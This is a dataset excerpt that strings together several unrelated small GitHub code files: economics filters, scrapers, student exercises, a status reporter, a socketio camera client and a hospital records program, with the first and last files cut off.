filter (1-d), need to add multivariate functionality.\n \n side : int\n The implementation requested. The function will default to the standard\n two-sided implementation.\n \n smooth : float \n The Hodrick-Prescott smoothing parameter. A value of 1600 is\n suggested for quarterly data. Ravn and Uhlig suggest using a value\n of 6.25 (1600/4**4) for annual data and 129600 (1600*3**4) for monthly\n data. The function will default to using the quarterly parameter (1600).\n\n freq : str\n Optional parameter to specify the frequency of the data. Will override\n the smoothing parameter and implement using the suggested value from\n Ravn and Uhlig. Accepts annual (a), quarterly (q), or monthly (m)\n frequencies.\n\n Returns\n -------\n \n cycle : ndarray\n The estimated cycle in the data given side implementation and the \n smoothing parameter.\n \n trend : ndarray\n The estimated trend in the data given side implementation and the \n smoothing parameter.\n \n References\n ----------\n Hodrick, R.J, and E. C. Prescott. 1980. \"Postwar U.S. Business Cycles: An\n Empirical Investigation.\" `Carnegie Mellon University discussion\n paper no. 451`.\n \n Meyer-Gohde, A. 2010. \"Matlab code for one-sided HP-filters.\"\n `Quantitative Macroeconomics & Real Business Cycles, QM&RBC Codes 181`.\n \n Ravn, M.O and H. Uhlig. 2002. \"Notes On Adjusted the Hodrick-Prescott\n Filter for the Frequency of Observations.\" `The Review of Economics and\n Statistics`, 84(2), 371-80.\n \n Examples\n --------\n from statsmodels.api import datasets, tsa\n import pandas as pd\n dta = datasets.macrodata.load_pandas().data\n index = pd.DatetimeIndex(start='1959Q1', end='2009Q4', freq='Q')\n dta.set_index(index, inplace=True)\n \n #Run original tsa.filters two-sided hp filter\n cycle_tsa, trend_ts = tsa.filters.hpfilter(dta.realgdp, 1600)\n #Run two-sided implementation\n cycle2, trend2 = hprescott(dta.realgdp, 2, 1600)\n #Run one-sided implementation\n cycle1, trend1 = hprescott(dta.realgdp, 1, 1600)\n '''\n \n #Determine smooth if a specific frequency is given\n if freq == 'q':\n smooth = 1600 #quarterly\n elif freq == 'a':\n smooth = 6.25 #annually\n elif freq == 'm':\n smooth = 129600 #monthly\n elif freq != '':\n print('''Invalid frequency parameter inputted. Defaulting to defined smooth\n parameter value or 1600 if no value was provided.''')\n \n pw = PandasWrapper(X)\n X = array_like(X, 'X', ndim=1)\n T = len(X)\n \n #Preallocate trend array\n trend = np.zeros(len(X))\n\n #Rearrange the first order conditions of minimization problem to yield matrix\n #First and last two rows are mirrored\n #Middle rows follow same pattern shifting position by 1 each row\n\n a1 = np.array([1+smooth, -2*smooth, smooth])\n a2 = np.array([-2*smooth, 1+5*smooth, -4*smooth, smooth])\n a3 = np.array([smooth, -4*smooth, 1+6*smooth, -4*smooth, smooth])\n \n Abeg = np.concatenate(([np.append([a1],[0])],[a2]))\n Aend = np.concatenate(([a2[3::-1]], [np.append([0],[a1[2::-1]])]))\n \n Atot = np.zeros((T, T))\n Atot[:2,:4] = Abeg\n Atot[-2:,-4:] = Aend\n\t\n for i in range(2, T-2):\n Atot[i,i-2:i+3] = a3\n\t\n if (side == 1):\n t = 2\n trend[:t] = X[:t]\n\n # Third observation minimization problem is as follows\t\n r3 = np.array([-2*smooth, 1+4*smooth, -2*smooth])\n\t\t\n Atmp = np.concatenate(([a1, r3], [a1[2::-1]]))\n Xtmp = X[:t+1]\n\n # Solve the system A*Z = X\n trend[t] = cho_solve(cho_factor(Atmp), Xtmp)[t]\n\t\t\n t += 1\n\n #Pattern begins with fourth observation\n #Create base A matrix with unique first and last two rows\n #Build recursively larger through time period\n Atmp = np.concatenate(([np.append([a1],[0])],[a2],[a2[3::-1]],[np.append([0],a1[2::-1])]))\n Xtmp = X[:t+1]\n\n trend[t] = cho_solve(cho_factor(Atmp), Xtmp)[t]\n\t\t\n while (t < T-1):\n\t\t\n t += 1\n\t\t\t\n Atmp = np.concatenate((Atot[:t-1,:t+1], np.zeros((2, t+1))))\n Atmp[t-1:t+1,t-3:t+1] = Aend\n\n Xtmp = X[:t+1]\n trend[t] = cho_solve(cho_factor(Atmp), Xtmp)[t]\n\t\t\n elif (side== 2):\n trend = cho_solve(cho_factor(Atot), X)\n else:\n raise ValueError('Side Parameter should be 1 or 2')\n\n cyclical = X - trend\n \n return pw.wrap(cyclical, append='cyclical'), pw.wrap(trend, append='trend')\n","repo_name":"OBTCOCA/btc_research","sub_path":"btc_functions/hpfilter.py","file_name":"hpfilter.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"49594072","text":"import requests\nfrom bs4 import BeautifulSoup\n\nbillboard_webpage='http://www.billboard.com/charts/hot-100'\nrequest = requests.get(billboard_webpage)\nsoup = BeautifulSoup(request.text, 'html.parser')\nprettyString = soup.prettify().encode('utf-8').strip()\ntitle_instances=soup.find_all('div',attrs={'class':'chart-list-item__title'})\nartist_instances=soup.find_all('div',attrs={'class':'chart-list-item__artist'})\ntitles=[]\nartists=[]\nfor title in title_instances:\n \ttitles.append(title.text.strip())\nfor artist in artist_instances:\n \tartists.append(artist.text.strip())\n\ntop10Titles=titles[:10]\ntop10Artists=artists[:10]\n\ndef getSongAndArtist(song,artist):\n \tid=1\n \tfor i in zip(song,artist):\n \tprint('#'+str(id),i[0],'by',i[1])\n \tid+=1\n\ngetSongAndArtist(top10Titles,top10Artists)\n\n\n","repo_name":"Maylibooyah69/PythonProject","sub_path":"dscrape/top10songs.py","file_name":"top10songs.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13134980714","text":"import random\r\nimport numpy as np \r\n\r\nclass Listasequencial:\r\n def __init__(self, capacidade):\r\n self.capacidade = capacidade\r\n self.ultima_posicao = -1\r\n self.valores = np.empty(self.capacidade, dtype=int)\r\n\r\n # O(n)\r\n def imprime(self):\r\n if self.ultima_posicao == -1:\r\n print('O vetor está vazio')\r\n else:\r\n for i in range(self.ultima_posicao + 1):\r\n print(i, ' - ', self.valores[i])\r\n\r\n # O(1) - O(2)\r\n def insere(self, valor):\r\n if self.ultima_posicao == self.capacidade - 1:\r\n print('Capacidade máxima atingida')\r\n else:\r\n self.ultima_posicao += 1 \r\n self.valores[self.ultima_posicao] = valor \r\n\r\n # O(n)\r\n def pesquisar(self, valor):\r\n for i in range(self.ultima_posicao + 1):\r\n if valor == self.valores[i]:\r\n return i\r\n return -1\r\n\r\n def pesquisar_indice(self, indice):\r\n for i in range(self.ultima_posicao + 1):\r\n if i == indice:\r\n return self.valores[i]\r\n return -1\r\n\r\n # O(n)\r\n def excluir(self, valor):\r\n posicao = self.pesquisar(valor)\r\n if posicao == -1:\r\n return -1\r\n else:\r\n for i in range(posicao, self.ultima_posicao):\r\n self.valores[i] = self.valores[i + 1]\r\n \r\n self.ultima_posicao -= 1\r\n\r\n def contagem(self, escolha):\r\n indice = self.pesquisar(escolha)\r\n for i in range(escolha):\r\n if indice == self.ultima_posicao:\r\n indice = 0\r\n else:\r\n indice += 1\r\n return indice\r\n\r\n \r\n\r\n'''Construa um programa em Python de acordo com situação problema descrita:\r\nUm grupo de soldados está cercado e não há esperança de vitória, \r\nporém existe somente um cavalo disponível para escapar e buscar por reforços.\r\nPara determinar qual soldado deve escapar para encontrar ajuda, eles formam um círculo (Fila Circular)\r\ne sorteiam um número de um chapéu. Começando por um soldado sorteado aleatoriamente,\r\numa contagem é realizada até o número sorteado. Quando a contagem terminar,\r\no soldado em que a contagem parou é removido do círculo, um novo número é sorteado e\r\na contagem recomeça no soldado seguinte ao que foi eliminado. A cada rodada, portanto, o círculo diminui em um,\r\naté que somente um soldado reste e seja escolhido para a tarefa.\r\n'''\r\n\r\n\r\nwhile True:\r\n try:\r\n qntd = int(input(\"Insira a quantidade de soldados: \"))\r\n break\r\n except:\r\n print(\"Comando inválido!\")\r\nlista = Listasequencial(qntd)\r\n\r\nfor i in range(qntd):\r\n while True:\r\n try:\r\n sold = int(input(f\"Nº do id do {i+1}º soldado: \"))\r\n break\r\n except:\r\n print(\"Comando inválido!\")\r\n lista.insere(sold)\r\n\r\n\r\n\r\nwhile lista.ultima_posicao > 0:\r\n esco1 = random.choice(lista.valores)\r\n print(f'\\nSoldado sorteado: Nº {esco1}\\n')\r\n print(\"Lista de soldados antes da remoção\")\r\n lista.imprime()\r\n ind_sold_apagado = lista.contagem(esco1)\r\n sold_apagado = lista.pesquisar_indice(ind_sold_apagado)\r\n print(f'\\nSoldado retirado da lista: {sold_apagado}')\r\n lista.excluir(sold_apagado)\r\n print('''\r\nLista de soldados depois da remoção\r\nÍndice - Soldado''')\r\n lista.imprime()\r\n\r\nprint(f'\\nO soldado ganhador é o soldado Nº {lista.valores[0]}')\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"mateuscpg/estrutura_de_dados","sub_path":"soldado_ganhador.py","file_name":"soldado_ganhador.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21929220024","text":"# Задание 6\na = int(input(\"Введите расстояние, которое спортсмен пробежал в первый день \"))\nb = int(input(\"Введите расстояние, которое спортсмен должен пробежать на определяемый день \"))\ndays = 1\nprint(f\"{days}-й день: {a}\")\nwhile a < b:\n a = round (a + a * 0.1, 2)\n days += 1\n if a <= b:\n print(f\"{days}-й день: {a}\")\n else:\n print(f\"{days}-й день: {a}\")\nelse:\n print(f\"Ответ: на {days}-й день спортсмен достиг результата — не менее {b} км.\")\n","repo_name":"Elvirshine/gb","sub_path":"python/hw_01/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73317021263","text":"\"\"\"\nUtility helper functions for the esbuild rule\n\"\"\"\n\nTS_EXTENSIONS = [\"ts\", \"tsx\"]\nJS_EXTENSIONS = [\"js\", \"jsx\", \"mjs\"]\nALLOWED_EXTENSIONS = JS_EXTENSIONS + TS_EXTENSIONS\n\ndef desugar_entry_point_names(entry_point, entry_points):\n \"\"\"Users can specify entry_point (sugar) or entry_points (long form).\n\n This function allows our code to treat it like they always used the long form.\n\n It also validates that exactly one of these attributes should be specified.\n\n Args:\n entry_point: the simple argument for specifying a single entry\n entry_points: the long form argument for specifing one or more entry points\n\n Returns:\n the array of entry poitns\n \"\"\"\n if entry_point and entry_points:\n fail(\"Cannot specify both entry_point and entry_points\")\n if not entry_point and not entry_points:\n fail(\"One of entry_point or entry_points must be specified\")\n if entry_point:\n return [entry_point]\n return entry_points\n\ndef write_args_file(ctx, args):\n args_file = ctx.actions.declare_file(\"%s.args.json\" % ctx.attr.name)\n ctx.actions.write(\n output = args_file,\n content = json.encode(args),\n )\n\n return args_file\n","repo_name":"aspect-build/rules_esbuild","sub_path":"esbuild/private/helpers.bzl","file_name":"helpers.bzl","file_ext":"bzl","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"} +{"seq_id":"15942770291","text":"s = input()\ndp_matrix = [[True for j in range(len(s))]for i in range(len(s))]\nfor i in range(len(s)-2, -1, -1):\n for j in range(i+1, len(s)):\n if not (s[i] == s[j] and dp_matrix[i+1][j-1]):\n dp_matrix[i][j] = False\nn = int(input())\nfor i in range(n):\n l, r = list(map(int, input().split()))\n l -= 1\n result = 0\n while dp_matrix[l][r-1] == False:\n lastture = l\n for i in range(l, r):\n if dp_matrix[l][i] is True:\n lastture = i\n result += 1\n l = lastture+1\n result += 1\n print(result)\n","repo_name":"hakaorson/CodePractise","sub_path":"Write_test/tencent/秋招第一场/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13437839744","text":"#-*- coding: utf-8 -*-\n#\n#creates a list of all possible combinations alphalower_numeric 4 char\n#you can always change it with like [alphanum = range(a-z)] or someshit, but i didnt want to do that.\n#\n#this script creates a list for termscrape\n#\n#made by \n#\n#\n#\n# ooooo ooooo ooooooooooooo ooooooooo.\n# `888' `888' 8' 888 `8 `888 `Y88.\n# 888 888 888 888 .d88'\n# 888ooooo888 888 888ooo88P'\n# 888 888 888 888\n# 888 888 888 888\n# o888o o888o o888o o888o\n#\n#\n#\nimport itertools\ndef htp():\n alphanum = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"0\"]\n #test = [\"a\",\"b\",\"c\",\"1\",\"2\",\"3\"]\n string = list(itertools.permutations(alphanum, 4))\n file = open(\"list.txt\", \"w\")\n for x in string:\n #print(''.join(x))\n file.write(str(''.join(x))+'\\n')\n file.close()\nhtp()\n","repo_name":"LeoGeo1337/fiche-scrape","sub_path":"charles.py3","file_name":"charles.py3","file_ext":"py3","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33050080836","text":"import os\nfrom datetime import datetime\nimport requests\nimport json\nimport certifi\nimport traceback\n\nclass cachet():\n\n def __init__(self):\n self.cachet_token = os.environ[\"cachet_token\"]\n\n def report(self, method, url, value_dict):\n headers = {\"Content-Type\": \"application/json\", \"X-Cachet-Token\": self.cachet_token}\n req = requests.request(method=method, url=url, json=value_dict, headers=headers, verify=certifi.where())\n return req\n\n def report_login_time(self, milliseconds, login_metric_id):\n data = {\n \"value\": int(milliseconds),\n \"timestamp\": int(datetime.utcnow().timestamp())\n }\n req = self.report(\"POST\", \"https://status.projectalt.is/api/v1/metrics/\" + str(login_metric_id) + \"/points\", data)\n return req\n\n def report_component(self, status_value, component_id):\n if status_value == self.get_component(component_id):\n print(\"Not updating component \" + str(component_id) + \" with the same value\")\n return\n data = {\n \"status\": int(status_value)\n }\n req = self.report(\"PUT\", \"https://status.projectalt.is/api/v1/components/\" + str(component_id), data)\n return req\n\n @staticmethod\n def get_component(component_id):\n req = requests.get(\"https://status.projectalt.is/api/v1/components/\" + str(component_id))\n try:\n jsn = json.loads(req.text)\n return int(jsn[\"data\"][\"status\"])\n except:\n print(\"Cachet API is dying with code \" + str(req.status_code) + \": \" + req.text)\n return 0","repo_name":"philicheese2003/ToontownProjectAltisServer","sub_path":"Panda3D-1.10.0/direct/cachet.py","file_name":"cachet.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"43199765564","text":"\r\n\r\nimport modules\r\n\r\nDATA_DOCTORS_FILE = \"doctors.txt\"\r\nDATA_PATIENTS_FILE = \"patients.txt\"\r\n\r\n# doctors function \r\ndef display_dr_menu():\r\n # display menu\r\n print()\r\n print(\"ARH Management System\")\r\n print(\" Doctor's Menu\\n\")\r\n print(\"1 - List of Doctors \")\r\n print(\"2 - Search for Doctor by ID \")\r\n print(\"3 - Search for Doctor by Name/Partial Name \")\r\n print(\"4 - Add new Doctor \")\r\n print(\"5 - Edit Doctor Info \")\r\n print(\"0 - Return to Main Menu\")\r\n\r\ndef manage_dr():\r\n\r\n display_dr_menu()\r\n # initialize menu option\r\n menu_option = \"11\"\r\n dr_list = []\r\n # Read the list of doctors from file and store it in the dr_list variable\r\n dr_list = read_doctors_file()\r\n # loop until user enters 0 to exit\r\n while menu_option != \"0\":\r\n menu_option = input(\"Enter option: \")\r\n if menu_option == \"1\":\r\n print()\r\n display_list_of_drs(dr_list)\r\n elif menu_option == \"2\":\r\n print()\r\n dr_id = int(input(\"Enter the doctor ID: \"))\r\n if find_dr_by_id(dr_id, dr_list) == -1:\r\n print(f\"Doctor with ID {dr_id} not found\")\r\n elif menu_option == \"3\":\r\n print()\r\n match_dr_by_name(dr_list)\r\n elif menu_option == \"4\":\r\n print()\r\n add_dr_to_list(dr_list)\r\n elif menu_option == \"5\":\r\n print()\r\n edit_dr_info(dr_list)\r\n # print doctor list\r\n display_list_of_drs(dr_list)\r\n display_dr_menu()\r\n # write doctors file\r\n write_drs_list_to_file(dr_list)\r\n\r\ndef read_doctors_file():\r\n #This function reads the data from the doctors.txt file and returns a list of doctor objects.\r\n dr_list = []\r\n with open(DATA_DOCTORS_FILE, \"r\") as dr_file:\r\n\r\n next(dr_file) \r\n for line in dr_file:\r\n line = line.strip()\r\n dr_data = line.split(\"_\")\r\n dr_obj = modules.Doctor(dr_data[0], dr_data[1], dr_data[2], dr_data[3], dr_data[4], dr_data[5])\r\n dr_list.append(dr_obj)\r\n return dr_list\r\n\r\ndef find_dr_by_id(dr_id, dr_list):\r\n#This function searches the doctor list for a doctor with the given ID\r\n for dr in dr_list:\r\n if dr.get_id() == dr_id:\r\n print(dr)\r\n return dr\r\n return -1\r\n\r\ndef match_dr_by_name(dr_list):\r\n # A function to match the doctor by their name\r\n output_list = []\r\n input_name = input(\"Enter the doctor name: \")\r\n nbr_matches = 0\r\n # Loop through the doctor list\r\n for dr in dr_list:\r\n if input_name.lower() in dr.get_name().lower():\r\n output_list.append(dr)\r\n nbr_matches += 1\r\n if nbr_matches == 0:\r\n print(\"Not found.\")\r\n else:\r\n display_list_of_drs(output_list)\r\n\r\ndef display_list_of_drs(dr_list):\r\n \r\n # print header\r\n print(f\"{'ID':<5s} {'Name':20s} {'Specialist':20s} {'Schedule':10s} {'Qualifications':15s} {'Room Nbr':>10s}\")\r\n for dr in dr_list:\r\n print(dr)\r\n\r\ndef get_new_dr_info():\r\n \r\n dr_name = input(\"Enter Dr name: \")\r\n dr_specialty = input(\"Enter Dr specialty: \")\r\n dr_schedule = input(\"Enter Dr schedule: \")\r\n dr_qualifications = input(\"Enter Dr qualifications: \")\r\n dr_room_number = input(\"Enter Dr room number: \")\r\n dr = modules.Doctor(0, dr_name, dr_specialty, dr_schedule, dr_qualifications, dr_room_number)\r\n return dr\r\n\r\ndef add_dr_to_list(dr_list):\r\n \r\n dr_id = int(input(\"Enter Dr ID: \"))\r\n dr = find_dr_by_id(dr_id, dr_list)\r\n if dr != -1:\r\n print(f'Doctor with id {dr_id} already exists - cannot add')\r\n else:\r\n dr = get_new_dr_info()\r\n dr.set_id(dr_id)\r\n dr_list.append(dr)\r\n print(f'Doctor with id {dr_id} successfully added')\r\n\r\ndef write_drs_list_to_file(dr_list):\r\n #This function takes in a list of doctor objects and writes their attributes to a file in a specific format\r\n#The file is opened in write mode, meaning it will overwrite any existing content\r\n with open(DATA_DOCTORS_FILE, \"w\") as dr_file:\r\n dr_file.write(\"ID_Name_Specialist_Schedule_Qualifications_Room Nbr\\n\")\r\n for dr in dr_list:\r\n dr_file.write(f'{dr.get_id()}_{dr.get_name()}_{dr.get_specialty()}_{dr.get_schedule()}_{dr.get_qualification()}_{dr.get_room_number()}\\n')\r\n\r\ndef edit_dr_info(dr_list):\r\n \r\n dr_id = int(input(\"Enter the doctor ID to edit: \"))\r\n new_dr = find_dr_by_id(dr_id, dr_list)\r\n if new_dr == -1:\r\n print(\"Doctor ID not found.\")\r\n else:\r\n new_dr = get_new_dr_info()\r\n new_dr.set_id(dr_id)\r\n # edit dr information\r\n for dr in dr_list:\r\n if dr.get_id() == dr_id:\r\n dr.set_name(new_dr.get_name())\r\n dr.set_specialty(new_dr.get_specialty())\r\n dr.set_schedule(new_dr.get_schedule())\r\n dr.set_qualification(new_dr.get_qualification())\r\n dr.set_room_number(new_dr.get_room_number())\r\n print(f\"Dr with ID {dr_id} successfully modified.\")\r\n\r\n# Patients Management functions\r\ndef display_patients_menu():\r\n # display menu\r\n print()\r\n print(\"ARH Management System\")\r\n print(\" Patinets's Menu\\n\")\r\n print(\"1 - List of Patients \")\r\n print(\"2 - Search for Patients by ID \")\r\n print(\"3 - Add new Patients \")\r\n print(\"4 - Edit Patients Info \")\r\n print(\"0 - Return to Main Menu\")\r\n\r\ndef manage_patients():\r\n \r\n\r\n # display menu\r\n display_patients_menu()\r\n # initialize menu option\r\n menu_option = \"11\"\r\n # initialize patients list\r\n list_of_patients = []\r\n # read patinets file\r\n list_of_patients = read_patients_file()\r\n # loop until user enters 0 to exit\r\n while menu_option != \"0\":\r\n menu_option = input(\"Enter option: \")\r\n if menu_option == \"1\":\r\n display_patient_list(list_of_patients)\r\n elif menu_option == \"2\":\r\n patients_id = int(input(\"Enter the patients ID: \"))\r\n if find_patients_by_id(patients_id, list_of_patients) == -1:\r\n print(f\"Patients with ID {patients_id} not found\")\r\n elif menu_option == \"3\":\r\n add_patient_to_list(list_of_patients)\r\n elif menu_option == \"4\":\r\n edit_Patient_info(list_of_patients)\r\n # print patients list\r\n display_patient_list(list_of_patients)\r\n display_patients_menu()\r\n # write doctors file\r\n write_patients_file(list_of_patients)\r\n\r\ndef read_patients_file():\r\n #This function reads the patients' data from a file and creates a list of patient objects.\r\n patients_list = []\r\n with open(DATA_PATIENTS_FILE, \"r\") as patients_file:\r\n # avoid the first header line\r\n next(patients_file)\r\n for line in patients_file:\r\n line = line.strip()\r\n #A new Patient object is created using the data, and then appended to the patients_list.\r\n patients_data = line.split(\"_\")\r\n patients_obj = modules.Patient(\r\n patients_data[0], patients_data[1], patients_data[2], patients_data[3], patients_data[4], )\r\n patients_list.append(patients_obj)\r\n return patients_list\r\n\r\ndef find_patients_by_id(patients_id, patients_list):\r\n #This function takes a patient ID and a list of patient objects as input.\r\n#It then searches the list of patient objects to find the patient with the given ID.\r\n for patients in patients_list:\r\n if patients.get_id() == patients_id:\r\n print(patients)\r\n return patients\r\n return -1\r\n\r\ndef display_patient_list(display_list_of_patients):\r\n#This function takes a list of patient objects as input.\r\n#It then iterates through the list and prints the details of each patient object.\r\n for patients in display_list_of_patients:\r\n print(patients)\r\n\r\ndef get_new_Patient_info():\r\n \r\n patients_name = input(\"Enter patient name: \")\r\n patients_diagnosis = input(\"Enter patient diagnosis: \")\r\n patients_gender = input(\"Enter patient gender: \")\r\n patients_age = input(\"Enter patient age: \")\r\n patient = modules.Patient(\r\n 0, patients_name, patients_diagnosis, patients_gender, patients_age)\r\n return patient\r\n\r\ndef add_patient_to_list(patient_list):\r\n # This function adds a new patient to the patient list.\r\n# It takes a list of patients as input.\r\n patient_id = int(input(\"Enter Patient ID: \"))\r\n patient = find_patients_by_id(patient_id, patient_list)\r\n if patient != -1:\r\n print(f'Patient with id {patient_id} already exists - cannot add')\r\n else:\r\n patient = get_new_Patient_info()\r\n patient.set_id(patient_id)\r\n patient_list.append(patient)\r\n print(f'Patient with id {patient_id} successfully added')\r\n\r\ndef write_patients_file(patients_list):\r\n # This function writes the patient list to the patient data file.\r\n# It takes a list of patients as input.\r\n with open(DATA_PATIENTS_FILE, \"w\") as patients_file:\r\n patients_file.write(\"ID_Name_Diagnosis_Gender_Age\\n\")\r\n for patient in patients_list:\r\n patients_file.write(\r\n f'{patient.get_id()}_{patient.get_name()}_{patient.get_diagnosis()}_{patient.get_gender()}_{patient.get_age()}\\n')\r\n\r\ndef edit_Patient_info(patients_list):\r\n patients_id = int(input(\"Enter the Patient ID to edit: \"))\r\n found = False\r\n for patient in patients_list:\r\n if patient.get_id() == patients_id:\r\n found = True\r\n new_patient = get_new_Patient_info()\r\n new_patient.set_id(patients_id)\r\n patient.set_name(new_patient.get_name())\r\n patient.set_diagnosis(new_patient.get_diagnosis())\r\n patient.set_gender(new_patient.get_gender())\r\n patient.set_age(new_patient.get_age())\r\n print(f\"Patient with ID {patients_id} successfully modified.\")\r\n break\r\n if not found:\r\n print(\"Patient ID not found.\")\r\n\r\ndef display_main_menu():\r\n print(\"\\nARH Management System\\n Main Menu\\n\\n1 - Doctor \\n2 - Patient \\n0 - Close Application\")\r\n\r\ndef main():\r\n \r\n main_menu_option = \"\"\r\n\r\n display_main_menu()\r\n\r\n while main_menu_option != \"0\":\r\n\r\n main_menu_option = input(\"Enter option: \")\r\n if main_menu_option == \"1\":\r\n manage_dr()\r\n display_main_menu()\r\n elif main_menu_option == \"2\":\r\n manage_patients()\r\n display_main_menu()\r\n\r\n print(\"ARH Management System successfully closed\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n exit(0)","repo_name":"Arshpreet77/PROJECT","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19101422087","text":"#-coding:utf-8-\nfrom Libraries.Scene import Scene\n\nclass Room(Scene):\n def __init__(self,game):\n self.Game = game\n Scene.__init__(self,self.Game)\n self.setBackground('WATERMILL_BACKGROUND')\n self.setForeground('WATERMILL_FOREGROUND')\n self.addVisibleElement(self.loadElement('Map'))\n self.setMap('bar.map')\n self.addExit(490,305,110,180,(550,500),\"blacksmith\",'NORTH')\n self.enter()\n \n def enter(self):\n self.Game.AudioController.playMusic('NOTEXPECTED')\n self.Game.AudioController.playAmbienceSound('AMBI_WATER')\n self.setInsertPoint((550,500))\n \n self.setFarthestPoint(415)\n self.setClosestPoint(715)\n self.setFarthestScale(50)\n self.setClosestScale(100)\n\n self.Game.Player.scriptWalk((550,570))\n self.show()","repo_name":"fordream/subterranean-ng","sub_path":"Assets/Scenes/watermill.py","file_name":"watermill.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30389229828","text":"# LIST COMPREHENTION\n# perform action on each item in the list\n\nimport random\nimport math\n\n\n# double each i to be put to the list\n# perform a e.g. calculation on the geerated range\nevenList = [i * 2 for i in range(11)]\n\nfor i in evenList:\n print(i)\n\nprint()\nprint()\n\n\nnumList =[1, 2, 3, 4, 5]\n\n# multidimensional list\n# perform actions in list on each item in the list of values\n# for each value create a list with all calculations (action)\nlistOfValues = [[math.pow(m, 2), math.pow(m, 3), math.pow(m, 4)]\n for m in numList]\n\nfor i in listOfValues:\n print(i)\n\nprint()\n","repo_name":"s3icc0/Tutorials","sub_path":"DBTut/Lesson 006 Lists/pytut_006_004.py","file_name":"pytut_006_004.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32557001626","text":"import asyncio\nimport socketio\nimport json\nimport cv2\nfrom greppelState import greppelState\nimport base64\n\n# cam = cv2.VideoCapture('/dev/video0') # LINUX\n# cam = cv2.VideoCapture(0, cv2.CAP_DSHOW) # Windows\nsio = socketio.AsyncClient()\nencode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 40]\nstate = greppelState(\n temp=69,\n num=30\n)\n\n\n@sio.event\nasync def connect():\n print('connection established')\n task = sio.start_background_task(background_task)\n # await send_cam()\n\n\n@sio.event\nasync def reconnect():\n print('reconnected')\n task = sio.start_background_task(background_task)\n\n\n# Word constant uitgevoerd na de startup tasks.\nasync def background_task():\n try:\n while True:\n await send_state()\n await send_cam()\n # await send_state()\n await asyncio.sleep(0.2)\n except Exception as e:\n print(e)\n\n\n# Verstuurd telemetrie naar de server\nasync def send_state():\n state.getState()\n\n dummydata = json.dumps(state.__dict__)\n await sio.emit(\"greppelstate\", dummydata)\n\n\n# Verstuurd een camera frame naar de website\nasync def send_cam():\n # status, frame = cam.read()\n\n frame = cv2.imread('test640.jpg')\n\n # rescale image to send\n scale_percent = 100 # percent of original size\n width = int(frame.shape[1] * scale_percent / 100)\n height = int(frame.shape[0] * scale_percent / 100)\n dim = (width, height)\n img = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n\n # encode to jpg to reduce size, convert to base64\n img_encoded = cv2.imencode('.jpg', img, encode_param)[1]\n data = base64.b64encode(img_encoded)\n\n await sio.emit('image', data)\n\n\n@sio.event\nasync def disconnect():\n print('disconnected from server')\n # cam.release()\n cv2.destroyAllWindows()\n\n\nasync def main():\n await sio.connect('http://greppel.tech:3000')\n await sio.wait()\n # cam.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"NonkNick/SocketGreppel","sub_path":"socketIOclient.py","file_name":"socketIOclient.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10629738265","text":"import warnings\n\nimport numpy as np\n\nfrom nengo.exceptions import ValidationError\nfrom nengo.params import (\n BoolParam,\n IntParam,\n NdarrayParam,\n NumberParam,\n Parameter,\n Unconfigurable,\n FrozenObject,\n)\nimport nengo.utils.numpy as npext\n\n\nclass Distribution(FrozenObject):\n \"\"\"A base class for probability distributions.\n\n The only thing that a probabilities distribution need to define is a\n `.Distribution.sample` method. This base class ensures that all\n distributions accept the same arguments for the sample function.\n \"\"\"\n\n def _sample_shape(self, n, d=None):\n \"\"\"Returns output shape for sample method.\"\"\"\n return (n,) if d is None else (n, d)\n\n def sample(self, n, d=None, rng=np.random):\n \"\"\"Samples the distribution.\n\n Parameters\n ----------\n n : int\n Number samples to take.\n d : int or None, optional\n The number of dimensions to return. If this is an int, the return\n value will be of shape ``(n, d)``. If None, the return\n value will be of shape ``(n,)``.\n rng : `numpy.random.mtrand.RandomState`, optional\n Random number generator state.\n\n Returns\n -------\n samples : (n,) or (n, d) array_like\n Samples as a 1d or 2d array depending on ``d``. The second\n dimension enumerates the dimensions of the process.\n \"\"\"\n raise NotImplementedError(\"Distributions should implement sample.\")\n\n\ndef get_samples(dist_or_samples, n, d=None, rng=np.random):\n \"\"\"Convenience function to sample a distribution or return samples.\n\n Use this function in situations where you accept an argument that could\n be a distribution, or could be an ``array_like`` of samples.\n\n Examples\n --------\n\n .. testcode::\n\n from nengo.dists import get_samples\n\n rng = np.random.RandomState(seed=0)\n\n def 